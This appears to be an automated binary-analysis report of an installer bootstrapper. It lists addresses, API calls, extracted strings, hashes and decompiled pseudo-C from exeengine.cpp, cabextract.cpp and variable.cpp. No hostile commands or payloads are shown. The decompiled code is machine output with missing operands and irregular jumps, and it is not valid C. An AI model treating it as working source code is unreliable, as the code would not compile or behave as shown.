                                                                                                                                                                  0x00419934
                                                                                                                                                                  0x0041993a
                                                                                                                                                                  0x00419685
                                                                                                                                                                  0x00419685
                                                                                                                                                                  0x00419686
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041968b
                                                                                                                                                                  0x004198dc
                                                                                                                                                                  0x004198de
                                                                                                                                                                  0x004198e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004198e6
                                                                                                                                                                  0x004198ec
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004198ec
                                                                                                                                                                  0x004197f9
                                                                                                                                                                  0x004197fc
                                                                                                                                                                  0x00419803
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419805
                                                                                                                                                                  0x00419808
                                                                                                                                                                  0x0041980d
                                                                                                                                                                  0x00419825
                                                                                                                                                                  0x00419827
                                                                                                                                                                  0x0041982a
                                                                                                                                                                  0x0041982c
                                                                                                                                                                  0x00419838
                                                                                                                                                                  0x00419841
                                                                                                                                                                  0x00419853
                                                                                                                                                                  0x00419855
                                                                                                                                                                  0x00419858
                                                                                                                                                                  0x0041985a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041985c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041985c
                                                                                                                                                                  0x0041982e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041982e
                                                                                                                                                                  0x004197e9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004197e9
                                                                                                                                                                  0x0041970b
                                                                                                                                                                  0x0041970e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419728
                                                                                                                                                                  0x0041972a
                                                                                                                                                                  0x0041972c
                                                                                                                                                                  0x00419735
                                                                                                                                                                  0x00419752
                                                                                                                                                                  0x00419754
                                                                                                                                                                  0x00419757
                                                                                                                                                                  0x00419759
                                                                                                                                                                  0x0041977a
                                                                                                                                                                  0x0041977c
                                                                                                                                                                  0x0041977e
                                                                                                                                                                  0x0041978a
                                                                                                                                                                  0x004197a2
                                                                                                                                                                  0x004197a7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004197a7
                                                                                                                                                                  0x00419780
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419780
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419759
                                                                                                                                                                  0x0041972e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041972e
                                                                                                                                                                  0x004196ce
                                                                                                                                                                  0x004196ce
                                                                                                                                                                  0x004196cf
                                                                                                                                                                  0x004196f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004196f0
                                                                                                                                                                  0x004196d1
                                                                                                                                                                  0x004196d4
                                                                                                                                                                  0x004196e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004196e5
                                                                                                                                                                  0x004196d6
                                                                                                                                                                  0x004196db
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004196db
                                                                                                                                                                  0x004196b6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004196b6
                                                                                                                                                                  0x0041967e
                                                                                                                                                                  0x00419680
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00419B70
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00419B88
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to append the list of dependencies to ignore to the obfuscated command line., xrefs: 0041985C
                                                                                                                                                                  • Failed to wait for executable to complete: %ls, xrefs: 00419AC3
                                                                                                                                                                  • %ls -%ls=%ls, xrefs: 0041981A, 00419848
                                                                                                                                                                  • Bootstrapper application aborted during EXE progress., xrefs: 00419AAE
                                                                                                                                                                  • Failed to run bundle as embedded from path: %ls, xrefs: 004198EC
                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 00419680
                                                                                                                                                                  • exeengine.cpp, xrefs: 004199C6, 00419A79, 00419AA4
                                                                                                                                                                  • Failed to format argument string., xrefs: 0041972E
                                                                                                                                                                  • Failed to build executable path., xrefs: 004196B6
                                                                                                                                                                  • "%ls" %s, xrefs: 00419747, 0041979C
                                                                                                                                                                  • "%ls", xrefs: 004197B2, 004197BD, 004197D9
                                                                                                                                                                  • Failed to create obfuscated executable command., xrefs: 004197E9
                                                                                                                                                                  • D, xrefs: 00419988
                                                                                                                                                                  • Failed to create executable command., xrefs: 0041975B
                                                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 004199D6
                                                                                                                                                                  • Failed to get action arguments for executable package., xrefs: 004196DB
                                                                                                                                                                  • Failed to run netfx chainer: %ls, xrefs: 0041993A
                                                                                                                                                                  • Failed to format obfuscated argument string., xrefs: 00419780
                                                                                                                                                                  • Failed to append the list of dependencies to ignore to the command line., xrefs: 0041982E
                                                                                                                                                                  • 2, xrefs: 00419A1C
                                                                                                                                                                  • burn.ignoredependencies, xrefs: 00419808, 0041980D, 00419841
                                                                                                                                                                  • Process returned error: 0x%x, xrefs: 00419A89
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID: "%ls"$"%ls" %s$%ls -%ls=%ls$2$Bootstrapper application aborted during EXE progress.$D$Failed to CreateProcess on path: %ls$Failed to append the list of dependencies to ignore to the command line.$Failed to append the list of dependencies to ignore to the obfuscated command line.$Failed to build executable path.$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$Failed to get action arguments for executable package.$Failed to get cached path for package: %ls$Failed to run bundle as embedded from path: %ls$Failed to run netfx chainer: %ls$Failed to wait for executable to complete: %ls$Process returned error: 0x%x$burn.ignoredependencies$exeengine.cpp
                                                                                                                                                                  • API String ID: 2962429428-3604779160
                                                                                                                                                                  • Opcode ID: 17993fef16c5d2262b34bd92aae31596d0bf423cd7bcc08e7cdd81dbc2c627f2
                                                                                                                                                                  • Instruction ID: abcb6209c858659c698c53d966455489224d57c8bea437be5af14e067fcfc682
                                                                                                                                                                  • Opcode Fuzzy Hash: 17993fef16c5d2262b34bd92aae31596d0bf423cd7bcc08e7cdd81dbc2c627f2
                                                                                                                                                                  • Instruction Fuzzy Hash: 60F1A171A40219AFDF21AF95CC99FDAB7B4BF18304F1000EAE509A2161DB799EC4DF19
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E004236DC(void* __ecx, union _LARGE_INTEGER* __edx, intOrPtr _a4, union _LARGE_INTEGER* _a8) {
                                                                                                                                                                  				union _LARGE_INTEGER* _v8;
                                                                                                                                                                  				union _LARGE_INTEGER _v12;
                                                                                                                                                                  				int _t30;
                                                                                                                                                                  				void* _t34;
                                                                                                                                                                  				intOrPtr _t42;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  				signed short _t52;
                                                                                                                                                                  				signed short _t56;
                                                                                                                                                                  				signed short _t59;
                                                                                                                                                                  				signed short _t62;
                                                                                                                                                                  				void* _t66;
                                                                                                                                                                  				intOrPtr _t68;
                                                                                                                                                                  				void* _t72;
                                                                                                                                                                  				signed short _t76;
                                                                                                                                                                  				void* _t77;
                                                                                                                                                                  				signed short _t79;
                                                                                                                                                                  				void* _t80;
                                                                                                                                                                  				signed short _t82;
                                                                                                                                                                  				void* _t83;
                                                                                                                                                                  				signed short _t86;
                                                                                                                                                                  				signed short _t87;
                                                                                                                                                                  				signed short _t88;
                                                                                                                                                                  				signed int _t89;
                                                                                                                                                                  				long _t90;
                                                                                                                                                                  				signed int _t93;
                                                                                                                                                                  				void* _t95;
                                                                                                                                                                  				union _LARGE_INTEGER* _t98;
                                                                                                                                                                  				intOrPtr _t100;
                                                                                                                                                                  				signed int _t103;
                                                                                                                                                                  
                                                                                                                                                                  				_t98 = __edx;
                                                                                                                                                                  				_push(_t89);
                                                                                                                                                                  				_t100 = _a4;
                                                                                                                                                                  				_t30 = SetEvent( *(_t100 + 0x28));
                                                                                                                                                                  				_t90 = _t89 | 0xffffffff;
                                                                                                                                                                  				if(_t30 != 0) {
                                                                                                                                                                  					if(WaitForSingleObject( *(_t100 + 0x24), _t90) != _t90) {
                                                                                                                                                                  						if(ResetEvent( *(_t100 + 0x24)) != 0) {
                                                                                                                                                                  							_t34 =  *((intOrPtr*)(_t100 + 0x2c)) - 1;
                                                                                                                                                                  							if(_t34 == 0) {
                                                                                                                                                                  								_t103 = E00434004(_t98,  *((intOrPtr*)(_t100 + 0x34)), _a8->LowPart.HighPart, 0, 0xfde9);
                                                                                                                                                                  								if(_t103 >= 0) {
                                                                                                                                                                  									if(SetEvent( *(_t100 + 0x28)) != 0) {
                                                                                                                                                                  										if(WaitForSingleObject( *(_t100 + 0x24), _t90) != _t90) {
                                                                                                                                                                  											if(ResetEvent( *(_t100 + 0x24)) != 0) {
                                                                                                                                                                  												_t42 =  *((intOrPtr*)(_t100 + 0x2c));
                                                                                                                                                                  												if(_t42 == 0) {
                                                                                                                                                                  													_t95 = CreateFileW( *(_t100 + 0x38), 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                  													 *(_t100 + 0x3c) = _t95;
                                                                                                                                                                  													if(_t95 != _t90) {
                                                                                                                                                                  														_push(0);
                                                                                                                                                                  														asm("cdq");
                                                                                                                                                                  														if(SetFilePointerEx(_t95,  *_a8, _t98, 0) != 0) {
                                                                                                                                                                  															if(SetEndOfFile( *(_t100 + 0x3c)) != 0) {
                                                                                                                                                                  																_push(0);
                                                                                                                                                                  																asm("xorps xmm0, xmm0");
                                                                                                                                                                  																asm("movlpd [ebp-0x8], xmm0");
                                                                                                                                                                  																if(SetFilePointerEx( *(_t100 + 0x3c), _v12, _v8, 0) == 0) {
                                                                                                                                                                  																	_t52 = GetLastError();
                                                                                                                                                                  																	_t107 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  																	_t103 =  >=  ? 0x80004005 :  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  																	E004300D9(0x80004005, "cabextract.cpp", 0x25a, _t103);
                                                                                                                                                                  																	_push("Failed to set file pointer to beginning of file.");
                                                                                                                                                                  																	goto L40;
                                                                                                                                                                  																}
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_t56 = GetLastError();
                                                                                                                                                                  																_t110 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  																_t103 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  																E004300D9(0x80004005, "cabextract.cpp", 0x254, _t103);
                                                                                                                                                                  																_push("Failed to set end of file.");
                                                                                                                                                                  																goto L40;
                                                                                                                                                                  															}
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t59 = GetLastError();
                                                                                                                                                                  															_t113 =  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  															_t103 =  >=  ? 0x80004005 :  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  															E004300D9(0x80004005, "cabextract.cpp", 0x24f, _t103);
                                                                                                                                                                  															_push("Failed to set file pointer to end of file.");
                                                                                                                                                                  															goto L40;
                                                                                                                                                                  														}
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t62 = GetLastError();
                                                                                                                                                                  														_t116 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  														_t103 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  														E004300D9(0x80004005, "cabextract.cpp", 0x248, _t103);
                                                                                                                                                                  														_push( *(_t100 + 0x38));
                                                                                                                                                                  														_push("Failed to create file: %ls");
                                                                                                                                                                  														goto L16;
                                                                                                                                                                  													}
                                                                                                                                                                  													goto L42;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_t66 = _t42 - 1;
                                                                                                                                                                  													if(_t66 == 0) {
                                                                                                                                                                  														_t68 = E00431078( *_a8, 1);
                                                                                                                                                                  														 *((intOrPtr*)(_t100 + 0x40)) = _t68;
                                                                                                                                                                  														if(_t68 != 0) {
                                                                                                                                                                  															 *(_t100 + 0x48) =  *(_t100 + 0x48) & 0x00000000;
                                                                                                                                                                  															 *(_t100 + 0x44) =  *_a8;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t103 = 0x8007000e;
                                                                                                                                                                  															E004300D9(_t68, "cabextract.cpp", 0x262, 0x8007000e);
                                                                                                                                                                  															_push("Failed to allocate buffer for stream.");
                                                                                                                                                                  															goto L40;
                                                                                                                                                                  														}
                                                                                                                                                                  														goto L42;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t72 = _t66 - 1;
                                                                                                                                                                  														if(_t72 == 0) {
                                                                                                                                                                  															_t50 = 0;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t73 = _t72 == 1;
                                                                                                                                                                  															if(_t72 == 1) {
                                                                                                                                                                  																goto L13;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_t93 = 0x8007139f;
                                                                                                                                                                  																_push(0x8007139f);
                                                                                                                                                                  																_push(0x273);
                                                                                                                                                                  																goto L12;
                                                                                                                                                                  															}
                                                                                                                                                                  															goto L42;
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t76 = GetLastError();
                                                                                                                                                                  												_t119 =  <=  ? _t76 : _t76 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												_t77 = 0x80004005;
                                                                                                                                                                  												_t103 =  >=  ? 0x80004005 :  <=  ? _t76 : _t76 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												_push(_t103);
                                                                                                                                                                  												_push(0x23d);
                                                                                                                                                                  												goto L8;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t79 = GetLastError();
                                                                                                                                                                  											_t122 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											_t80 = 0x80004005;
                                                                                                                                                                  											_t103 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											_push(_t103);
                                                                                                                                                                  											_push(0x238);
                                                                                                                                                                  											goto L5;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t82 = GetLastError();
                                                                                                                                                                  										_t125 =  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_t83 = 0x80004005;
                                                                                                                                                                  										_t103 =  >=  ? 0x80004005 :  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_push(_t103);
                                                                                                                                                                  										_push(0x232);
                                                                                                                                                                  										goto L2;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push(_a8->LowPart.HighPart);
                                                                                                                                                                  									_push("Failed to copy stream name: %ls");
                                                                                                                                                                  									L16:
                                                                                                                                                                  									_push(_t103);
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  									goto L42;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t73 = _t34 == 4;
                                                                                                                                                                  								if(_t34 == 4) {
                                                                                                                                                                  									L13:
                                                                                                                                                                  									_t103 = 0x80004004;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t93 = 0x8007139f;
                                                                                                                                                                  									_push(0x8007139f);
                                                                                                                                                                  									_push(0x228);
                                                                                                                                                                  									L12:
                                                                                                                                                                  									_t103 = _t93;
                                                                                                                                                                  									E004300D9(_t73);
                                                                                                                                                                  									E00430A57(_t93, "Invalid operation for this state.", "cabextract.cpp");
                                                                                                                                                                  									_t90 = _t93 | 0xffffffff;
                                                                                                                                                                  									goto L41;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L42;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t86 = GetLastError();
                                                                                                                                                                  							_t128 =  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t77 = 0x80004005;
                                                                                                                                                                  							_t103 =  >=  ? 0x80004005 :  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_push(_t103);
                                                                                                                                                                  							_push(0x21a);
                                                                                                                                                                  							L8:
                                                                                                                                                                  							_push("cabextract.cpp");
                                                                                                                                                                  							E004300D9(_t77);
                                                                                                                                                                  							_push("Failed to reset begin operation event.");
                                                                                                                                                                  							goto L40;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t87 = GetLastError();
                                                                                                                                                                  						_t131 =  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t80 = 0x80004005;
                                                                                                                                                                  						_t103 =  >=  ? 0x80004005 :  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_push(_t103);
                                                                                                                                                                  						_push(0x215);
                                                                                                                                                                  						L5:
                                                                                                                                                                  						_push("cabextract.cpp");
                                                                                                                                                                  						E004300D9(_t80);
                                                                                                                                                                  						_push("Failed to wait for begin operation event.");
                                                                                                                                                                  						goto L40;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t88 = GetLastError();
                                                                                                                                                                  					_t134 =  <=  ? _t88 : _t88 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t83 = 0x80004005;
                                                                                                                                                                  					_t103 =  >=  ? 0x80004005 :  <=  ? _t88 : _t88 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_push(_t103);
                                                                                                                                                                  					_push(0x20f);
                                                                                                                                                                  					L2:
                                                                                                                                                                  					_push("cabextract.cpp");
                                                                                                                                                                  					E004300D9(_t83);
                                                                                                                                                                  					_push("Failed to set operation complete event.");
                                                                                                                                                                  					L40:
                                                                                                                                                                  					_push(_t103);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					L41:
                                                                                                                                                                  					L42:
                                                                                                                                                                  					_t50 = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				 *(_t100 + 0x30) = _t103;
                                                                                                                                                                  				_t91 =  >=  ? _t50 : _t90;
                                                                                                                                                                  				_t51 =  >=  ? _t50 : _t90;
                                                                                                                                                                  				return  >=  ? _t50 : _t90;
                                                                                                                                                                  			}
































                                                                                                                                                                  0x004237c0
                                                                                                                                                                  0x004237c3
                                                                                                                                                                  0x004237ef
                                                                                                                                                                  0x004237ef
                                                                                                                                                                  0x004237c5
                                                                                                                                                                  0x004237c5
                                                                                                                                                                  0x004237ca
                                                                                                                                                                  0x004237cb
                                                                                                                                                                  0x004237d0
                                                                                                                                                                  0x004237d5
                                                                                                                                                                  0x004237d7
                                                                                                                                                                  0x004237e2
                                                                                                                                                                  0x004237e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004237e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004237c3
                                                                                                                                                                  0x00423782
                                                                                                                                                                  0x00423782
                                                                                                                                                                  0x00423793
                                                                                                                                                                  0x00423796
                                                                                                                                                                  0x0042379d
                                                                                                                                                                  0x004237a0
                                                                                                                                                                  0x004237a1
                                                                                                                                                                  0x004237a6
                                                                                                                                                                  0x004237a6
                                                                                                                                                                  0x004237ab
                                                                                                                                                                  0x004237b0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004237b0
                                                                                                                                                                  0x0042373d
                                                                                                                                                                  0x0042373d
                                                                                                                                                                  0x0042374e
                                                                                                                                                                  0x00423751
                                                                                                                                                                  0x00423758
                                                                                                                                                                  0x0042375b
                                                                                                                                                                  0x0042375c
                                                                                                                                                                  0x00423761
                                                                                                                                                                  0x00423761
                                                                                                                                                                  0x00423766
                                                                                                                                                                  0x0042376b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042376b
                                                                                                                                                                  0x004236f7
                                                                                                                                                                  0x004236f7
                                                                                                                                                                  0x00423708
                                                                                                                                                                  0x0042370b
                                                                                                                                                                  0x00423712
                                                                                                                                                                  0x00423715
                                                                                                                                                                  0x00423716
                                                                                                                                                                  0x0042371b
                                                                                                                                                                  0x0042371b
                                                                                                                                                                  0x00423720
                                                                                                                                                                  0x00423725
                                                                                                                                                                  0x00423a80
                                                                                                                                                                  0x00423a80
                                                                                                                                                                  0x00423a81
                                                                                                                                                                  0x00423a86
                                                                                                                                                                  0x00423a88
                                                                                                                                                                  0x00423a8a
                                                                                                                                                                  0x00423a8a
                                                                                                                                                                  0x00423a8b
                                                                                                                                                                  0x00423a91
                                                                                                                                                                  0x00423a95
                                                                                                                                                                  0x00423a99

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,00000000,?,0042329E,?,?), ref: 004236EA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,0042329E,?,?), ref: 004236F7
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000000,00000000,?,0042329E,?,?), ref: 00423733
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0042329E,?,?), ref: 0042373D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EventObjectSingleWait
                                                                                                                                                                  • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                  • API String ID: 3600396749-2104912459
                                                                                                                                                                  • Opcode ID: 4d08242e12c5d8d50a4c673d89665f10a1ad598223545e5ab1285a5331b2af7c
                                                                                                                                                                  • Instruction ID: e682a47c0b598dbaf2299a1f93c5bb84b4295f8417852d07f3833c5291fe90a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 4d08242e12c5d8d50a4c673d89665f10a1ad598223545e5ab1285a5331b2af7c
                                                                                                                                                                  • Instruction Fuzzy Hash: DA91EF32B40631BBFB21AA75AD09B6675E4EF08751F114227FE05EA590E7ADDC0086EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E00402162(void* __edx, struct _CRITICAL_SECTION* _a4, signed short _a8, intOrPtr _a12, signed short _a16, intOrPtr _a20) {
                                                                                                                                                                  				signed short _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				signed short _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				signed short _v28;
                                                                                                                                                                  				intOrPtr* _v32;
                                                                                                                                                                  				char _v36;
                                                                                                                                                                  				signed short _v40;
                                                                                                                                                                  				signed short _v44;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				intOrPtr* _t115;
                                                                                                                                                                  				signed short _t116;
                                                                                                                                                                  				signed short _t118;
                                                                                                                                                                  				signed short _t120;
                                                                                                                                                                  				signed short _t121;
                                                                                                                                                                  				signed short _t127;
                                                                                                                                                                  				signed short _t128;
                                                                                                                                                                  				signed short _t134;
                                                                                                                                                                  				signed short _t140;
                                                                                                                                                                  				signed short _t153;
                                                                                                                                                                  				signed short _t159;
                                                                                                                                                                  				signed short _t160;
                                                                                                                                                                  				signed short _t168;
                                                                                                                                                                  				WCHAR* _t180;
                                                                                                                                                                  				signed short _t181;
                                                                                                                                                                  				signed int _t182;
                                                                                                                                                                  				signed short _t183;
                                                                                                                                                                  				signed short _t184;
                                                                                                                                                                  				signed int _t185;
                                                                                                                                                                  				void* _t188;
                                                                                                                                                                  				void* _t190;
                                                                                                                                                                  				signed short _t194;
                                                                                                                                                                  				signed short _t195;
                                                                                                                                                                  				signed short _t201;
                                                                                                                                                                  				signed short _t202;
                                                                                                                                                                  				void* _t205;
                                                                                                                                                                  				intOrPtr* _t206;
                                                                                                                                                                  				signed int _t207;
                                                                                                                                                                  				signed short _t208;
                                                                                                                                                                  				signed short _t209;
                                                                                                                                                                  				signed short _t210;
                                                                                                                                                                  				signed short _t213;
                                                                                                                                                                  				signed short _t216;
                                                                                                                                                                  				signed short _t219;
                                                                                                                                                                  				signed short _t222;
                                                                                                                                                                  				void* _t223;
                                                                                                                                                                  
                                                                                                                                                                  				_t205 = __edx;
                                                                                                                                                                  				_t207 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v36 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				EnterCriticalSection(_a4);
                                                                                                                                                                  				_t180 = _a8;
                                                                                                                                                                  				_t208 = E00433BDF( &_v24, lstrlenW(_t180) + 1);
                                                                                                                                                                  				_a8 = _t208;
                                                                                                                                                                  				if(_t208 >= 0) {
                                                                                                                                                                  					_push(0x5b);
                                                                                                                                                                  					_push(_t180);
                                                                                                                                                                  					_t209 = E00426E94(_t113, _t180, _t188, _t205, 0, _t208, __eflags);
                                                                                                                                                                  					_v40 = _t209;
                                                                                                                                                                  					while(1) {
                                                                                                                                                                  						_pop(_t190);
                                                                                                                                                                  						__eflags = _t209;
                                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t13 = _t209 + 2; // 0x2
                                                                                                                                                                  						_t115 = _t13;
                                                                                                                                                                  						_push(0x5d);
                                                                                                                                                                  						_v32 = _t115;
                                                                                                                                                                  						_t116 = E00426E94(_t115, _t180, _t190, _t205, _t207, _t209, __eflags);
                                                                                                                                                                  						_t190 = _t115;
                                                                                                                                                                  						_v44 = _t116;
                                                                                                                                                                  						__eflags = _t116;
                                                                                                                                                                  						if(_t116 == 0) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t201 = (_t116 - _t209 >> 1) - 1;
                                                                                                                                                                  						__eflags = _t201;
                                                                                                                                                                  						_v20 = _t201;
                                                                                                                                                                  						if(_t201 != 0) {
                                                                                                                                                                  							__eflags = _t209 - _t180;
                                                                                                                                                                  							if(_t209 <= _t180) {
                                                                                                                                                                  								L12:
                                                                                                                                                                  								_t208 = E00433F88( &_v12, _v32, _t201);
                                                                                                                                                                  								_a8 = _t208;
                                                                                                                                                                  								__eflags = _t208;
                                                                                                                                                                  								if(_t208 < 0) {
                                                                                                                                                                  									_push("Failed to get variable name.");
                                                                                                                                                                  									L7:
                                                                                                                                                                  									_push(_t208);
                                                                                                                                                                  									L8:
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  									L64:
                                                                                                                                                                  									_t181 = _v8;
                                                                                                                                                                  									goto L65;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t185 = _v8;
                                                                                                                                                                  								_t202 = _v16;
                                                                                                                                                                  								_push(1);
                                                                                                                                                                  								_push(4 + _t185 * 4);
                                                                                                                                                                  								__eflags = _t202;
                                                                                                                                                                  								if(_t202 == 0) {
                                                                                                                                                                  									_t201 = E00431078();
                                                                                                                                                                  									_v16 = _t201;
                                                                                                                                                                  									__eflags = _t201;
                                                                                                                                                                  									if(_t201 == 0) {
                                                                                                                                                                  										_t184 = 0x8007000e;
                                                                                                                                                                  										_t208 = 0x8007000e;
                                                                                                                                                                  										_a8 = 0x8007000e;
                                                                                                                                                                  										E004300D9(_t150, "variable.cpp", 0x3ea, 0x8007000e);
                                                                                                                                                                  										_push("Failed to allocate variable array.");
                                                                                                                                                                  										L36:
                                                                                                                                                                  										_push(_t184);
                                                                                                                                                                  										goto L8;
                                                                                                                                                                  									}
                                                                                                                                                                  									L17:
